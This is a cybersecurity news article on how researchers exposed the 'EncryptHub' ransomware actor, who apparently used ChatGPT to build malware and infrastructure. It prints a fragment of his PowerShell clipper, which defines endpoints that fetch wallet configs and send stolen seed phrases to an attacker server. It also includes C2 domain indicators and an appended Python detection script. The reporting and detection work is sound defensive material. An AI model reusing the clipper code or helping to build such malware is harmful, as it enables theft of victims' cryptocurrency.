EncryptHub Ransomware Unmasked Using ChatGPT & OPSEC Mistakes

A notorious threat actor operating under the alias “EncryptHub” has been exposed due to a series of operational security failures and unconventional use of AI tools.

This Ukrainian cybercriminal, who fled his hometown approximately a decade ago, has been orchestrating increasingly sophisticated ransomware campaigns since early 2024, targeting organizations worldwide with custom-built malware designed to steal cryptocurrency and sensitive information.

EncryptHub (Source – Outpost24)

The threat actor’s journey into cybercrime appears to have begun after unsuccessful attempts at legitimate employment and brief involvement with bug bounty programs.

What distinguishes EncryptHub from typical cybercriminals is the dichotomy of his activities – while conducting malicious campaigns, he simultaneously contributed to legitimate security research, even receiving acknowledgment from Microsoft Security Response Center for discovering CVE-2025-24071 and CVE-2025-24061.

What ultimately led to EncryptHub’s unmasking was a catastrophic series of operational security failures, including password reuse across criminal infrastructure, failure to enable two-factor authentication, and inadequate server hardening that left directory listings publicly accessible.

Perhaps most critically, the threat actor tested his own malware on development systems, inadvertently exfiltrating his personal information and access credentials.

Outpost24’s KrakenLabs researchers identified the malware after discovering an exposed JSON configuration file on EncryptHub’s command and control server.

This file contained Telegram bot information that provided investigators with a digital trail leading directly to the threat actor’s activities.

Initial discovery and analysis

According to the KrakenLabs team, this initial discovery “was actually what triggered the entire investigation”.

The most fascinating aspect of this case is EncryptHub’s extensive reliance on ChatGPT as a “partner in crime.”

The AI assistant was leveraged to create nearly every component of his malicious infrastructure, from writing malware code to configuring Telegram bots, command and control servers, phishing sites, and onion services.

In one particularly revealing conversation, EncryptHub asked the AI to evaluate whether he was better suited to be a “black hat or white hat” hacker, even confessing to criminal activities and exploits he had developed.

The clipper malware developed with ChatGPT’s assistance represents one of EncryptHub’s primary attack vectors.

This PowerShell-based malware was designed to monitor clipboards for cryptocurrency wallet addresses and replace them with attacker-controlled alternatives.

The code demonstrates how the malware loads wallet configurations from a remote server and operates continuously to intercept transactions:

# API URLs for fetching the config and sending seed phrases
$serverConfigUrl = "https:// dmin/clipper/config"
$serverSendSeedUrl = "https: /admin/clipper/send_seed"
# Function that returns the infected host's public IP
function Get-PublicIP {
    try {
        $response = Invoke-RestMethod -Uri "https://api64.ipify.org?format=json" -ErrorAction Stop
        return $response.ip
    } catch {
        # Lookup failed (no network or service unavailable)
        return $null
    }
}

This case highlights the emerging trend of threat actors leveraging artificial intelligence for malware development while still falling victim to basic security mistakes.

EncryptHub’s exposed infrastructure revealed numerous IOCs, including multiple PowerShell scripts, executable files, and command and control domains like vexio[.]io and echonex[.]ai that organizations should monitor for in their environments.
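As an added illustration of monitoring for the published indicators (this is example detection code, not part of the Outpost24 report), the following refangs the defanged C2 domains and matches them against DNS/proxy query logs, treating subdomains as hits but not look-alike names. The log lines and the `query=` field format are constructed for the example.

```python
import re

# Defanged C2 domains named in the article; the "[.]" notation must be
# refanged before the strings can be matched against real log data.
ENCRYPTHUB_C2_DOMAINS = ["vexio[.]io", "echonex[.]ai"]

# Constructed sample DNS/proxy log lines (not real telemetry).
SAMPLE_LOGS = [
    "2025-03-14T10:01:02Z host=WS01 query=update.vexio.io type=A",
    "2025-03-14T10:01:05Z host=WS02 query=echonex.ai type=A",
    "2025-03-14T10:01:09Z host=WS03 query=notvexio.io type=A",           # look-alike, not a hit
    "2025-03-14T10:01:11Z host=WS04 query=vexio.io.example.com type=A",  # IOC is not the suffix
    "2025-03-14T10:01:15Z host=WS05 query=api64.ipify.org type=A",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'vexio[.]io' or 'hxxps://x' into its real form."""
    return indicator.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http").lower()


def matches_domain(hostname: str, ioc_domain: str) -> bool:
    """True when hostname is the IOC domain itself or one of its subdomains.

    The leading '.' in the suffix check stops 'notvexio.io' from matching 'vexio.io'.
    """
    hostname = hostname.lower().rstrip(".")
    return hostname == ioc_domain or hostname.endswith("." + ioc_domain)


def find_c2_hits(log_lines, defanged_domains):
    """Return (log_line, matched_domain) pairs for lines whose queried host is an IOC."""
    iocs = [refang(d) for d in defanged_domains]
    query_re = re.compile(r"\bquery=(?P<host>[A-Za-z0-9.-]+)")
    hits = []
    for line in log_lines:
        m = query_re.search(line)
        if not m:
            continue
        for ioc in iocs:
            if matches_domain(m.group("host"), ioc):
                hits.append((line, ioc))
                break
    return hits


if __name__ == "__main__":
    for line, ioc in find_c2_hits(SAMPLE_LOGS, ENCRYPTHUB_C2_DOMAINS):
        print(f"ALERT {ioc}: {line}")
```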


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.